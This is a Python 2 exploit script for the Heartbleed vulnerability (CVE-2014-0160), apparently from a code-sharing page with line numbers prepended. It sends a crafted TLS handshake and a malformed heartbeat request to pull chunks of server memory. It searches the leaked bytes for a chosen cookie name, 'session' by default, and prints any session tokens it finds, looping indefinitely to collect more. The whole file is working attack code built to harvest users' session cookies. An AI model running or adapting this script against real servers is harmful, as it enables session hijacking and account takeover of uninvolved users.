usr bin python Connects to servers vulnerable to CVE-2014-0160 and loo

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
#!/usr/bin/python
# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.
# Michael Davis (mike.philip.davis@gmail.com)
# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import select
import sys
import string
import struct
import socket
import time
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
class HeartBleeder(object):
server_response = None
socket = None
hostname = ''
port = 443
found_sessions = set()
cookie = 'session'
cookie_length = 56
def __init__(self, hostname='', cookie=''):
self.hostname = hostname
self.cookie = cookie
def connect(self):
"""
Connects to the remote server.
"""
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sys.stdout.flush()
self.socket.connect((self.hostname, self.port))
sys.stdout.flush()
self.socket.send(hello)
sys.stdout.flush()
def rcv_response(self):
while True:
_type, version, payload = self.rcv_message()
if _type is None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if _type == 22 and ord(payload[0]) == 0x0E:
break
def rcv_message(self):
record_header = self.rcv_all(5)
if record_header is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
_type, version, line = struct.unpack('>BHH', record_header)
payload = self.rcv_all(line, 10)
if payload is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
# print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return _type, version, payload
def rcv_all(self, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([self.socket], [], [], 5)
if self.socket in r:
data = self.socket.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def try_heartbeat(self):
self.socket.send(hb)
while True:
_type, version, self.payload = self.rcv_message()
if _type is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if _type == 24:
# print 'Received heartbeat response:'
self.parse_response()
if len(self.payload) > 3:
pass
# print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if _type == 21:
print 'Received alert:'
self.hexdump(self.payload)
print 'Server returned error, likely not vulnerable'
return False
def parse_response(self):
"""
Parses the response from the server for a session id.
"""
ascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload)
index = string.find(ascii, self.cookie)
if index >= 0:
info = ascii[index:index + self.cookie_length]
session = info.split(' ')[0]
session = string.replace(session, ';', '')
if session not in self.found_sessions:
self.found_sessions.add(session)
print session
def hexdump(self, payload):
"""
Prints out a hexdump in the event that server returns an error.
"""
for b in xrange(0, len(payload), 16):
line = [c for c in payload[b:b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in line)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def scan(self):
self.connect()
self.rcv_response()
self.try_heartbeat()
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
cookies_str = 'session'
if len(args) > 1:
cookies_str = args[1]
print cookies_str
while True:
heartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str)
heartbeat.scan()
if __name__ == '__main__':
main()